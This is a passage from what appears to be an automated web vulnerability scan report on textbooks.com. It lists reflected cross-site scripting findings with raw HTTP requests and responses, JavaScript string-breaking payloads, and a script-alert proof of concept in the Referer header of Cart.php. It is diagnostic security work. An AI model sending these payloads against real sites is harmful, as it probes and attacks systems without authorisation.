2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
Reset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/php.js5032c';e9abaae6140'

</script>
...[SNIP]...

1.87. https://www.textbooks.com/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd3c'%3b05d551d3562 was submitted in the REST URL parameter 1. This input was echoed as 7dd3c';05d551d3562 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7dd3c'%3b05d551d3562/s_code.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js7dd3c';05d551d3562/s_code.js'

</script>
...[SNIP]...

1.88. https://www.textbooks.com/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e6a0'%3bbc6da8b4aa6 was submitted in the REST URL parameter 2. This input was echoed as 8e6a0';bc6da8b4aa6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/s_code.js8e6a0'%3bbc6da8b4aa6 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/s_code.js8e6a0';bc6da8b4aa6'

</script>
...[SNIP]...

1.89. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd482'%3b7286a6537af was submitted in the REST URL parameter 1. This input was echoed as fd482';7286a6537af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfd482'%3b7286a6537af/tbcart-ajax.js HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 14:28:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
pSearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/jsfd482';7286a6537af/tbcart-ajax.js'

</script>
...[SNIP]...

1.90. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /js/tbcart-ajax.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f90a4'%3b1ec79ba0ae1 was submitted in the REST URL parameter 2. This input was echoed as f90a4';1ec79ba0ae1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/tbcart-ajax.jsf90a4'%3b1ec79ba0ae1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3633
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:06 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
{
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/js/tbcart-ajax.jsf90a4';1ec79ba0ae1'

</script>
...[SNIP]...

1.91. https://www.textbooks.com/modcss.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /modcss.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3061b'%3bc453652cc98 was submitted in the REST URL parameter 1. This input was echoed as 3061b';c453652cc98 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modcss.php3061b'%3bc453652cc98 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=hjZlzWqZkjI%2FavpRaMU%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=XMAfEE8erk9DX4If5cPwRHHKHTBaga444Rt9mN0bio%2F4uGXEHOdre2Ik2RNt3rQdrjksbvlj51D2KQ00hb85Qimxm0PoTuzyvQbynYuGGLxDv%2BrlBEt31pVIxiezSChs9EMClc5LggTyRLS0F6XDf426sDUiaz8OvPV1Gt7SjtxC%2BKVj87PFTHqcG44Swnyy6WqhjUSSkFyTQi2cSDZh69Z7IdTbYLdlB%2BaK7jN9kuWNLDWMFrxP8QU%2FJtHrrueXurMYHboRlZFvODKInaMd%2BWH9sgq5kJs47sgDjTUhFr5%2FyeMmtj9iZ5ceEf5sbNO%2FR%2FdVYR6Hd8bb8doclxQ4RlpT7bn8lN%2FKJgRwa%2BorpngWfvFc8Xk8D8nLR%2FUyvSGpojZ3JWO2%2BXNH0PD4kmz2gMGilA5ySaXo802TuEohzdJ2zorN%2BmkEVlWQYMnELciQt5YUn2%2B7zrkuoDJoZlBjN5u7Y90waboiN71rWG1nVRi96cLDLwN5MJYWrN5XAbBbsJXYdwQN3n5k0uaOcwlQdasRz2A8aRVmWyJvx9r2UGdUQb6dYOIRYJNjRqnkoswxJGuAgWLp3Jx5HjJqj%2BcMIJLab0zufrWIMLGZrmh4kg%2FNLXq%2FV5JUiBab9oJRZfoLtmdifQxG%2FEsQ3uKIx%2BVlEMhAVKYVvdiaTqbwESqKXgA6pIoAJeX3iYqy%2BiE6xExJu0E5WfkbT1IVwnCskVvj6V2Dz%2FJ1KXGLZGIkpqNwgPJpD5f5ylhhSCtp7LK9o24E1J6T9sIPicqvXrAskidWUJosizXRt8f5rVND4%2B9SevpHLCjDCwKvxlcv57h8DDcwvm3xxebTMTZ%2BBX%2B8XpvsnX%2BL0FHW%2BSgtZ7XwaCZWVbK3%2FF9X6wsQWN8HGymDHFMC27NLEbzshfr1dPimkwyu23sAM1Mcu3BHTDcG6cvUVOIWyKkdf2zIqPcBc205Vie3XmGdtebRAEpbdi1ZJTGYFlLGQv42MpSCvUqFT879OTibd%2FBDhiG8PaC4VKUufFginK%2FdKnyVa%2FgCr6zHTnzOhIwljmBJLipIEDHsCEtF5ze3SPMwJcmYazbL0ZbKcFB2ZQB3skCReXLO%2BtHeTGCr9gM0%2B7ijfKJRdbEhy82usUY9TO%2Fl01xBTAN3ocnic07ysQZMPT13fHGfdc%2FYp3pzZgUQaKpENLyWEfpevDYMnZ7Ro2fiC5CwpOzB3JOA9XM0%2B2IZn2JKSSvyHwH%2ByiuD7M0ZY2qpXl05seazr1k219ICwkjboFN6BT4zfD8%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 14:28:09 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/modcss.php3061b';c453652cc98'

</script>
...[SNIP]...

1.92. http://www.textbooks.com/Cart.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3205f'><script>alert(1)</script>0f100bc08b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;
Referer: http://www.google.com/search?hl=en&q=3205f'><script>alert(1)</script>0f100bc08b9

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Content-Length: 25454
Connection: close
